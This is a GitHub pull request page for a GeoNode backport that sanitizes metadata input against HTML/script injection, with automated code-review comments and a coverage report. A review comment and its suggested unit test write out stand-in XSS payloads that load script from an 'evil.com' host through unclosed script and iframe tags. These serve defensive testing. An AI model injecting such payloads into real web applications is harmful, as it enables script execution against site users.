[Backport 5.0.x] Sanitize metadata input#14343
Conversation
There was a problem hiding this comment.
Code Review
This pull request introduces a new CleanupHandler to sanitize metadata fields from potentially unsafe HTML tags (XSS protection) during deserialization, along with corresponding unit tests and localization updates. The review feedback highlights a critical security vulnerability where unclosed HTML tags can bypass the sanitization regex, suggesting a simplified pattern to catch them. Additionally, the feedback recommends removing redundant list conversions during dictionary and list iterations to improve performance, and adding a unit test to verify the sanitization of unclosed tags.
Important
The consumer version of Gemini Code Assist on GitHub is being sunset. Starting June 18, 2026, new organization installations will be blocked, and all code review activity will officially cease on July 17, 2026.
For more details on the timeline and next steps, please review the Help Documentation.
|
|
||
|
|
||
| class CleanupHandler(MetadataHandler): | ||
| _HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>") |
There was a problem hiding this comment.
The regular expression _HTML_LIKE_PATTERN requires a closing > to match ([^>]*>). This creates a critical security vulnerability (XSS bypass). An attacker can submit an unclosed dangerous tag, such as <script src="http://evil.com/xss.js", which will not be matched by the pattern and thus will bypass sanitization completely. When rendered in the browser, the browser's lenient HTML parser will use subsequent tags in the page to close the unclosed tag and execute the malicious script.
To fix this, simplify the pattern to detect any potential tag start (closed or unclosed), allowing BeautifulSoup to safely parse and decompose it.
| _HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>") | |
| _HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z]") |
| for key, nested_value in list(value.items()): | ||
| nested_path = path + [str(key)] | ||
| value[key] = self._sanitize_instance(nested_value, context, errors, nested_path) | ||
| return value | ||
|
|
||
| if isinstance(value, list): | ||
| for idx, nested_value in enumerate(list(value)): |
There was a problem hiding this comment.
Creating list copies of dictionary items (list(value.items())) and list elements (list(value)) is redundant and inefficient.
Since we are only modifying the values of existing keys in the dictionary and elements in the list without changing their sizes/lengths, we can safely iterate over value.items() and value directly. This avoids unnecessary memory allocation and improves performance.
| for key, nested_value in list(value.items()): | |
| nested_path = path + [str(key)] | |
| value[key] = self._sanitize_instance(nested_value, context, errors, nested_path) | |
| return value | |
| if isinstance(value, list): | |
| for idx, nested_value in enumerate(list(value)): | |
| for key, nested_value in value.items(): | |
| nested_path = path + [str(key)] | |
| value[key] = self._sanitize_instance(nested_value, context, errors, nested_path) | |
| return value | |
| if isinstance(value, list): | |
| for idx, nested_value in enumerate(value): |
| self.assertIn("title", context["errors"]) | ||
| self.assertIn("__errors", context["errors"]["title"]) | ||
| self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"]) |
There was a problem hiding this comment.
Add a unit test to verify that unclosed dangerous HTML tags (e.g., <script or <iframe without a closing >) are successfully detected and sanitized, preventing future regressions of the XSS bypass vulnerability.
| self.assertIn("title", context["errors"]) | |
| self.assertIn("__errors", context["errors"]["title"]) | |
| self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"]) | |
| self.assertIn("title", context["errors"]) | |
| self.assertIn("__errors", context["errors"]["title"]) | |
| self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"]) | |
| @override_settings(LANGUAGE_CODE="en") | |
| def test_pre_deserialization_sanitizes_unclosed_tags(self): | |
| instance = { | |
| "title": "<script src=http://evil.com/xss.js", | |
| "body": "<iframe src=http://evil.com", | |
| } | |
| context = {"errors": {}} | |
| self.handler.pre_deserialization(self.resource, {}, instance, partial=set(), context=context) | |
| self.assertEqual(instance["title"], "") | |
| self.assertEqual(instance["body"], "") |
There was a problem hiding this comment.
Pull request overview
This PR introduces server-side sanitization of incoming metadata payloads to mitigate HTML/script injection, and adds an i18n thesaurus entry to surface a user-facing warning when sanitization occurs.
Changes:
- Add a
CleanupHandlerthat recursively strips HTML-like content from incoming metadata values (pre-deserialization). - Wire the sanitization step into
MetadataManager.update_schema_instance()and propagate anerrorsdict via context. - Add i18n RDF labels for new/updated metadata error messages and add unit tests covering sanitization behavior.
Reviewed changes
Copilot reviewed 4 out of 4 changed files in this pull request and generated 2 comments.
| File | Description |
|---|---|
| geonode/metadata/thesauri/labels-i18n.metadata.rdf | Adds i18n thesaurus concepts/labels including metadata_error_sanitized. |
| geonode/metadata/tests/tests.py | Updates manager-context expectations and adds tests for sanitization/logging/error reporting. |
| geonode/metadata/manager.py | Injects errors into context and calls CleanupHandler.pre_deserialization() before handler updates. |
| geonode/metadata/handlers/meta.py | Implements CleanupHandler to sanitize nested strings and record warnings/errors. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| with self.assertLogs("geonode.metadata.handlers.meta", level="WARNING") as cm: | ||
| context = {"errors": {}} | ||
| self.handler.pre_deserialization(self.resource, {}, instance, partial=set(), context=context) | ||
|
|
||
| self.assertEqual(instance["title"], "xss") | ||
| self.assertEqual(instance["details"]["body"], "safe") | ||
| self.assertEqual(instance["items"][1], "bad") | ||
| self.assertEqual(instance["count"], 3) | ||
|
|
||
| logs = "\n".join(cm.output) | ||
| self.assertIn("Sanitized potentially unsafe metadata field 'title'", logs) | ||
| self.assertIn("Sanitized potentially unsafe metadata field 'details.body'", logs) | ||
| self.assertIn("Sanitized potentially unsafe metadata field 'items.[1]'", logs) | ||
|
|
||
| self.assertIn("title", context["errors"]) | ||
| self.assertIn("__errors", context["errors"]["title"]) | ||
| self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"]) |
| <?xml version='1.0' encoding='UTF-8'?> | ||
| <rdf:RDF xmlns="http://www.w3.org/2004/02/skos/core#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/"> | ||
| <ConceptScheme rdf:about="https://i18n.geonode.org"> |
Codecov Report❌ Patch coverage is Additional details and impacted files@@ Coverage Diff @@
## 5.0.x #14343 +/- ##
========================================
Coverage ? 74.51%
========================================
Files ? 945
Lines ? 56863
Branches ? 7707
========================================
Hits ? 42372
Misses ? 12809
Partials ? 1682 🚀 New features to boost your workflow:
|
Sanitize metadata input
Checklist
For all pull requests:
The following are required only for core and extension modules (they are welcomed, but not required, for contrib modules):
Submitting the PR does not require you to check all items, but by the time it gets merged, they should be either satisfied or inapplicable.